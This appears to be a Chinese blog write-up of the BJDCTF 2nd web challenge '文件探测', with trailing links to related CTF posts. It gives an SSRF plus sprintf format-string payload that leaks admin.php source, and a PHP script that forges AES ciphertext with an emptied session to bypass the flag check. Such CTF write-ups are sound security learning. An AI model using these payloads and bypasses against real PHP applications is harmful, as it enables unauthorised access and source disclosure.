[BJDCTF 2nd]文件探测

最新推荐文章于 2022-03-04 14:43:59 发布
最新推荐文章于 2022-03-04 14:43:59 发布
阅读量1k 收藏
点赞数
分类专栏: 笔记
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/SopRomeo/article/details/105138327
版权

代码审计题,
刚开始我用kali的dirb扫描到
admin.php 和 robots.txt两个目录
进入到admin.php
在这里插入图片描述

以为是改http头,不可取

回过头来看源代码

在这里插入图片描述

这里已经提示,抓包在响应头看到hint,有个home.php,访问进去看看
观察他的url
在这里插入图片描述

存在文件包含,读取到system 的源码
重要代码如下:

<?php

$filter1 = '/^http:\/\/127\.0\.0\.1\//i';
$filter2 = '/.?f.?l.?a.?g.?/i';


if (isset($_POST['q1']) && isset($_POST['q2']) && isset($_POST['q3']) ) {
    $url = $_POST['q2'].".y1ng.txt";
    $method = $_POST['q3'];

    $str1 = "~$ python fuck.py -u \"".$url ."\" -M $method -U y1ng -P admin123123 --neglect-negative --debug --hint=xiangdemei<br>";

    echo $str1;

    if (!preg_match($filter1, $url) ){
        die($str2);
    }
    if (preg_match($filter2, $url)) {
        die($str3);
    }
    if (!preg_match('/^GET/i', $method) && !preg_match('/^POST/i', $method)) {
        die($str4);
    }
    $detect = @file_get_contents($url, false);
    print(sprintf("$url method&content_size:$method%d", $detect));
}

?>

第一个q1不用管,没有任何过滤

看到q2 的过滤,基本上可以看出这是个SSRF了,但是后面会被加上y1ng.txt的后缀

再看到q3,

必须得有 GET 或者 POST 开头

sprintf()格式化注入漏洞参考文献

@file_get_contents($url, false);
    print(sprintf("$url method&content_size:$method%d", $detect))

因为%d整形输出,我们要以字符型输出(%s)才能看到admin,php的代码,利用sprintf()漏洞
%% 将%吞掉,d就没用了

前面再加个%s,就可以通过file_get_contents函数输出admin.php的代码了

payload:

q1=fuckyou&q2=http://127.0.0.1/admin.php?q=1&q3=GET%s%

得到admin.php 的源码

<?php
error_reporting(0);
session_start();
$f1ag = 'f1ag{s1mpl3_SSRF_@nd_spr1ntf}'; //fake

function aesEn($data, $key)
{
    $method = 'AES-128-CBC';
    $iv = md5($_SERVER['REMOTE_ADDR'],true);
    return  base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}

function Check()
{
    if (isset($_COOKIE['your_ip_address']) && $_COOKIE['your_ip_address'] === md5($_SERVER['REMOTE_ADDR']) && $_COOKIE['y1ng'] === sha1(md5('y1ng')))
        return true;
    else
        return false;
}

if ( $_SERVER['REMOTE_ADDR'] == "127.0.0.1" ) {
    highlight_file(__FILE__);
} else {
    echo "<head><title>403 Forbidden</title></head><body bgcolor=black><center><font size='10px' color=white><br>only 127.0.0.1 can access! You know what I mean right?<br>your ip address is " . $_SERVER['REMOTE_ADDR'];
}


$_SESSION['user'] = md5($_SERVER['REMOTE_ADDR']);

if (isset($_GET['decrypt'])) {
    $decr = $_GET['decrypt'];
    if (Check()){
        $data = $_SESSION['secret'];
        include 'flag_2sln2ndln2klnlksnf.php';
        $cipher = aesEn($data, 'y1ng');
        if ($decr === $cipher){
            echo WHAT_YOU_WANT;
        } else {
            die('爬');
        }
    } else{
        header("Refresh:0.1;url=index.php");
    }
} else {
    //I heard you can break PHP mt_rand seed
    mt_srand(rand(0,9999999));
    $length = mt_rand(40,80);
    $_SESSION['secret'] = bin2hex(random_bytes($length));
}


?>
%d

可以发现%d被当成字符窜输出了
先看到主体代码
可以知道session的值是个随机数。

if (isset($_GET['decrypt'])) {
    $decr = $_GET['decrypt'];
    if (Check()){       //调用check函数
        $data = $_SESSION['secret'];
        include 'flag_2sln2ndln2klnlksnf.php';
        $cipher = aesEn($data, 'y1ng');
        if ($decr === $cipher){
            echo WHAT_YOU_WANT;
        } else {
            die('爬');
        }
    } else{
        header("Refresh:0.1;url=index.php");
    }
} else {
    //I heard you can break PHP mt_rand seed
    mt_srand(rand(0,9999999));
    $length = mt_rand(40,80);
    $_SESSION['secret'] = bin2hex(random_bytes($length)); //生成随机字符窜
}

看到加密函数

function aesEn($data, $key)
{
    $method = 'AES-128-CBC';
    $iv = md5($_SERVER['REMOTE_ADDR'],true);
    return  base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}

告诉我们加密方式了
其他参数都知道,由于session值可以更改,所以我们让session值为空,就能够自己算出密文绕过他的审查
再看到admin.php的页面
在这里插入图片描述
必须要这个ip
由此构造密文脚本

<?php
function aesEn($data, $key)
{
    $method = 'AES-128-CBC';
    $iv = md5('174.0.222.75', true); // your global ip address here
    return  base64_encode(openssl_encrypt($data, $method,$key, OPENSSL_RAW_DATA , $iv));
}

$cipher = aesEn('NULL', 'y1ng');
echo urlencode($cipher);
//一定要url编码,不然不成功
?>

将PHPSESSID删去(也就是置空)再将decrypt=“脚本输出的密文”传入即可

感觉代码审计最能体现ctfer的能力

buuoj BJDCTF 2nd rsa1
pondzhang的专栏
03-26 1057
e=12563813 p2+q2=212364140166849615900345386827373855409339975015067104662427876599237913584644325298351035312142873679076322952156014899039684112869213110216339149927308917382659025088961162906104834...
BJDCTF-文件探测-ssrf+逻辑漏洞
qq_42188168的博客
03-24 461
一、ssrf 信息收集了一波,发现home.php这个hint以及admin.php,访问 随后用伪协议读取system.php的源码和 <?php error_reporting(0); if (!isset($_COOKIE['y1ng']) || $_COOKIE['y1ng'] !== sha1(md5('y1ng'))){ echo "<script>al...
BJDCTF 2nd菜鸡做题记录
bmth666的博客
03-25 3345
文章目录 萌新赛 做了一下web,感觉还没有入门,太难了吧,然后看大佬博客把能写的复现一下 [BJDCTF 2nd]简单注入 这道题没写出来,想了好久才想到可以用\转义掉',然后就开始盲注,发现禁用了select,尝试绕过未果,卡死,看师傅文章才发现可以正则匹配出password,妙呀,先写一下我的思路 username=\ password=...
BJDCTF 2nd writeup(二)
01-21
文章目录Misc[BJDCTF 2nd]A_Beautiful_Picture[BJDCTF 2nd]小姐姐-y1ng[BJDCTF 2nd]TARGZ-y1ng[BJDCTF 2nd]Imagin &ndash; 开场曲Crypto[BJDCTF 2nd]cat_flag[BJDCTF 2nd]燕言燕语[BJDCTF 2nd]Y1nglish Misc [BJDCTF 2nd]...
CTF-Pwn-[BJDCTF 2nd]rci
01-09
CTF-Pwn-[BJDCTF 2nd]rci 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 ...
BJDCTF 2nd总结
rreally的博客
03-26 1465
crypto 签到-y1ng 这道题基本上是最常见的体系base64直接解得BJD{W3lc0me_T0_BJDCTF} 老文盲了 这题挺奇葩的,打开发现内容为“罼雧締眔擴灝淛匶襫黼瀬鎶軄鶛驕鳓哵眔鞹鰝”前三个首写为BJD,后面读出来是“大括号这就是flag直接交了吧大括号”,所以提交BJD{淛匶襫黼瀬鎶軄鶛驕鳓哵}。 cat_flag 这题出的属于知识盲区,完全没有头绪,直到看讲解时得知可以“喵...
BJDCTF 第二届 WEBwriteup
qq_40648358的博客
03-23 5023
文章目录[BJDCTF 2nd]fake google[BJDCTF 2nd]old-hack[BJDCTF 2nd]duangShell[BJDCTF 2nd]简单注入[BJDCTF 2nd]Schrödinger [BJDCTF 2nd]fake google 这题是我出的,因为源码中只过滤了BJD的输出,原意是字符串切片过滤一下,在buu上的flag是flag{}的形式,所以过滤也就失效...
CTF有效的目录扫描工具
12-13
CTF有效的目录扫描工具
BJD-Web-文件探测-wp
m0_46657149的博客
03-26 355
上周周末做了BJDCTF感觉收获很大,这里记录一下web的文件探测题解。题目都在BUUOJ上面,对应wp地址: 官方wp y1ng师傅的web题解(出题人) 打开题目发现没啥信息,源码提示跟上次BJDCTF有关系,但我没参加上次的(因为太菜),最后在Header信息里发现home.php的hint。访问: 发现file参数对应system.php很容易发现是文件包含,尝试用filter伪协议读取...
鸟哥私房菜2nd文件的压缩与打包
黄俊东的专栏
12-26 2437
CTF知识点
weixin_48450741的博客
06-15 1023
CTF知识点binwalkforemostPDF字符'1qwk'弱等于数字1上传文件存在模板注入/?flag={{config}}!$GLOBALS签到题IDEA 字符串查找flagexiftooldbeaver反弹shellburpsuite binwalk binwalk -e 文件的位置 在CTF中Binwalk常用于分析隐藏文件 扫描选项: -B,-- signature 扫描目标文件的常见文件签名 -R,–raw = 扫描目标文件的指定字符序列 -A,–opcodes扫描目标文件中常见可执行代码
[BJDCTF 2nd]简单注入
夜幕下的灯火阑珊的博客
05-14 1050
访问robots.txt得到提示:hint.txt,访问hint.txt select * from users where username='$_POST["username"]' and password='$_POST["password"]'; 如果传入username=admin\password=123456#就会变成 select * from u...
CTF利用工具探测尝试获取Flag
网站安全专家
03-04 5052
接下来咱们就使用攻击工具来探测一下靶场机器的这个服务信息。这里我们使用MFSV也就是探测服务端口,然后加上靶场的IP地址。下面我们回到kali linux进行探测。首先 Nmap -sv 192.168.213.10回车,这时候我们靶场机器,就被我们这kaili正在探测探测还是比较快的,这里我们看到它开放了一些服务,比如说SSH服务以及HTTP服务,开放了两个HTTP服务。 这时候我们探测完毕,在探测结束之后,我们需要对探测结果进行分析,这里我们提前给大家说一个知识点,就是每一个服务对应计算机的一个
file_get_contents使用
u011553255的专栏
11-11 1206
语法 file_get_contents(path,include_path,context,start,max_length) 参数     描述 path     必需。规定要读取的文件。 include_path     可选。如果也想在 include_path 中搜寻文件的话,可以将该参数设为 "1"。 context      可选。规定文件句柄的环境。
PHP的函数file_get_contents() 把整个文件读入一个字符串中
zh17822307855的博客
01-12 178
file_get_contents('http://erptest.bajiechewu.com/admin.php?a=selfApi&c=sendWxTextMsg&wxid=KFXS-004&content=[高德-六年免检]订单号:'.$dealCode.'退款失败');file_get_contents(SITE_PATH.'/.htaccess');
BJDCTF 2nd 刷题记录
yao_xin_de_yuan的博客
03-23 3316
misc 最简单的misc zip伪加密---------7z解压 winhex打开文件发现png缺少头部 正常的png 加上89504e47得到图片(此处不知道为什么不能直接添加 因此winhex新建了一个文件将数据复制进去得到完整的png) 从图片中得到一串16进制字符串------------16进制转文本得到flag misc a-beautiful-gril ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值